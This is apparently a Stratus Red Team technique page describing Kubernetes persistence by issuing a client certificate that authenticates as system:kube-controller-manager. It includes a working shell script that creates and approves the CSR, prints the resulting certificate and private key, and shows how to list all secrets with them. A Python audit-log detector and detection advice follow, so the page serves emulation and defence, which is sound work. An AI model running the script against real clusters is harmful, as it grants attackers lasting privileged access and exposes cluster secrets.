
Create Client Certificate Credential

idempotent

Platform: Kubernetes

MITRE ATT&CK Tactics

  • Persistence

Description

Creates a client certificate for a privileged user. This client certificate can be used to authenticate to the cluster.

Warm-up: None

Detonation:

  • Create a certificate signing request (CSR)
  • Wait for the CSR to be picked up and return a certificate
  • Print the client-side certificate and private key

Note: This attack technique does not succeed on AWS EKS. Due to apparent undocumented behavior, the managed EKS control plane does not issue a certificate for the certificate signing request (CSR), even after it has been approved. Detonating it there is still useful for simulating the attacker behavior (CSR creation and approval) and exercising detections.

Note: The certificate is requested for the subject system:kube-controller-manager because that user exists in most clusters and already has a ClusterRoleBinding to ClusterRole/system:kube-controller-manager, which includes privileged permissions such as reading all secrets in the cluster and creating tokens for any service account. Since the API server maps a client certificate's CN to the username, a certificate with this CN authenticates as that user.
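The three detonation steps above, as an added example that is not Stratus Red Team's own code: the script generates a key pair and a PEM CSR with openssl, wraps the CSR in a CertificateSigningRequest manifest for the built-in kubernetes.io/kube-apiserver-client signer, and (when run with the argument `detonate`) submits it, approves it, waits for the signer to populate status.certificate, and prints the resulting credential pair. It assumes openssl and kubectl are on PATH, that the current kubeconfig context may create and approve CSRs, and a Linux-style base64; the object name `stratus-client-cert` is a hypothetical placeholder.

```sh
#!/bin/sh
# Added example, not Stratus Red Team's own code: reproduce the three detonation
# steps with openssl and kubectl. Assumes both are on PATH, that the current
# kubeconfig context can create and approve CSRs, and a Linux-style base64.
set -eu

CSR_NAME="${CSR_NAME:-stratus-client-cert}"   # hypothetical object name
SUBJECT_CN="system:kube-controller-manager"   # the CN becomes the username
WORKDIR="${WORKDIR:-$(mktemp -d)}"

# Step 1: generate a private key and a PEM CSR for the target CN, then print the
# CertificateSigningRequest manifest that asks the generic client signer for it.
build_csr_manifest() {
  openssl req -new -newkey rsa:2048 -nodes \
    -keyout "$WORKDIR/client.key" -out "$WORKDIR/client.csr" \
    -subj "/CN=$SUBJECT_CN" >/dev/null 2>&1
  req_b64=$(base64 < "$WORKDIR/client.csr" | tr -d '\n')
  cat <<EOF
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: $CSR_NAME
spec:
  request: $req_b64
  signerName: kubernetes.io/kube-apiserver-client
  expirationSeconds: 86400
  usages:
    - client auth
EOF
}

# Read the subject back out of the generated CSR (sanity check before submitting).
csr_subject() {
  openssl req -in "$WORKDIR/client.csr" -noout -subject
}

# Steps 1-3 against a live cluster: submit, approve, wait for status.certificate,
# then print the client certificate and private key.
detonate() {
  build_csr_manifest | kubectl apply -f -
  kubectl certificate approve "$CSR_NAME"
  i=0
  cert=""
  while [ "$i" -lt 30 ]; do
    cert=$(kubectl get csr "$CSR_NAME" -o jsonpath='{.status.certificate}')
    [ -n "$cert" ] && break
    i=$((i + 1))
    sleep 2
  done
  if [ -z "$cert" ]; then
    echo "signer never issued a certificate (expected on EKS, see the note above)" >&2
    return 1
  fi
  printf '%s' "$cert" | base64 -d > "$WORKDIR/client.crt"
  echo "--- client certificate ---"; cat "$WORKDIR/client.crt"
  echo "--- private key ---";        cat "$WORKDIR/client.key"
  # The pair now authenticates as system:kube-controller-manager, e.g.:
  # kubectl --client-certificate="$WORKDIR/client.crt" \
  #         --client-key="$WORKDIR/client.key" get secrets -A
}

case "${1:-}" in
  detonate) detonate ;;
esac
```

Approving the CSR requires the `approve` verb on `signers` for kubernetes.io/kube-apiserver-client, which is why the technique is a persistence step taken after privileged access has already been obtained rather than a privilege escalation on its own.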

Instructions

Detonate with Stratus Red Team
stratus detonate k8s.persistence.create-client-certificate

Detection

Use Kubernetes API server audit logs. In particular, look for creation and approval of CertificateSigningRequest objects that do not correspond to standard cluster operation. Kubelet certificate issuance is requested by node or bootstrap identities (groups system:nodes and system:bootstrappers) for the kubernetes.io/kube-apiserver-client-kubelet and kubernetes.io/kubelet-serving signers and is approved by the controller manager; a CSR for the kubernetes.io/kube-apiserver-client signer created by any other principal, or a CSR approved by a human or service-account identity, is worth investigating. If the policy logs request bodies, the requested signerName and the subject of the CSR can be inspected directly.
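A detection sketch for the rule above, added here and not part of Stratus Red Team: it runs over a handful of constructed audit.k8s.io/v1 events (the usernames, CSR names and the `stratus-client-cert` object are hypothetical) and flags CSR creations by non-node principals and CSR approvals by anything other than the controller manager. It assumes the audit policy logs CSR operations at level Request or RequestResponse when signerName is to be inspected; when requestObject is absent it falls back to the requester's groups.

```python
import json

# Constructed sample audit events (not real logs). Field names follow the
# audit.k8s.io/v1 Event schema; requestObject is only present when the audit
# policy logs the CSR at level Request or RequestResponse.
SAMPLE_AUDIT_LINES = [
    # Normal kubelet bootstrap: a bootstrap identity asks the kubelet client signer.
    json.dumps({"kind": "Event", "verb": "create",
                "user": {"username": "system:bootstrap:abcdef",
                         "groups": ["system:bootstrappers", "system:authenticated"]},
                "objectRef": {"resource": "certificatesigningrequests", "name": "csr-bootstrap1"},
                "requestObject": {"spec": {"signerName": "kubernetes.io/kube-apiserver-client-kubelet"}}}),
    # Normal auto-approval by the controller manager's csrapproving controller.
    json.dumps({"kind": "Event", "verb": "update",
                "user": {"username": "system:kube-controller-manager", "groups": ["system:authenticated"]},
                "objectRef": {"resource": "certificatesigningrequests", "subresource": "approval",
                              "name": "csr-bootstrap1"}}),
    # Normal node serving-certificate renewal.
    json.dumps({"kind": "Event", "verb": "create",
                "user": {"username": "system:node:ip-10-0-0-1", "groups": ["system:nodes", "system:authenticated"]},
                "objectRef": {"resource": "certificatesigningrequests", "name": "csr-serving1"},
                "requestObject": {"spec": {"signerName": "kubernetes.io/kubelet-serving"}}}),
    # Unrelated traffic that the rule must ignore.
    json.dumps({"kind": "Event", "verb": "get",
                "user": {"username": "alice", "groups": ["system:authenticated"]},
                "objectRef": {"resource": "pods", "namespace": "default", "name": "web-0"}}),
    # Technique, step 1: a non-node principal requests the generic client signer.
    json.dumps({"kind": "Event", "verb": "create",
                "user": {"username": "alice", "groups": ["system:authenticated"]},
                "objectRef": {"resource": "certificatesigningrequests", "name": "stratus-client-cert"},
                "requestObject": {"spec": {"signerName": "kubernetes.io/kube-apiserver-client"}}}),
    # Technique, step 2: the same principal approves it by hand.
    json.dumps({"kind": "Event", "verb": "update",
                "user": {"username": "alice", "groups": ["system:authenticated"]},
                "objectRef": {"resource": "certificatesigningrequests", "subresource": "approval",
                              "name": "stratus-client-cert"}}),
]

# Identities and signers involved in routine kubelet certificate issuance.
NODE_GROUPS = {"system:nodes", "system:bootstrappers"}
KUBELET_SIGNERS = {"kubernetes.io/kube-apiserver-client-kubelet", "kubernetes.io/kubelet-serving"}
EXPECTED_APPROVERS = {"system:kube-controller-manager"}


def classify_csr_event(event):
    """Return a reason string if the event is a CSR operation outside normal
    kubelet certificate issuance, otherwise None."""
    ref = event.get("objectRef", {})
    if ref.get("resource") != "certificatesigningrequests":
        return None
    user = event.get("user", {})
    username = user.get("username", "")
    groups = set(user.get("groups", []))
    verb = event.get("verb")
    # signerName is only known when the request body was logged.
    signer = event.get("requestObject", {}).get("spec", {}).get("signerName")

    if verb == "create":
        if not groups & NODE_GROUPS:
            return "CSR created by non-node principal %s (signer=%s)" % (username, signer or "unknown")
        if signer is not None and signer not in KUBELET_SIGNERS:
            return "node principal %s requested non-kubelet signer %s" % (username, signer)
        return None
    if verb == "update" and ref.get("subresource") == "approval":
        if username not in EXPECTED_APPROVERS:
            return "CSR approved manually by %s" % username
        return None
    return None


def find_suspicious_csr_activity(lines):
    """Parse JSON audit lines and return one finding per suspicious CSR event."""
    findings = []
    for line in lines:
        event = json.loads(line)
        reason = classify_csr_event(event)
        if reason:
            findings.append({"csr": event["objectRef"].get("name"),
                             "user": event["user"].get("username"),
                             "verb": event["verb"],
                             "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_csr_activity(SAMPLE_AUDIT_LINES):
        print(finding)
```

Once a certificate has been issued, the same audit logs show API requests from user system:kube-controller-manager; requests under that name arriving from a source IP other than the control plane's are the follow-on signal that the credential is in use.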
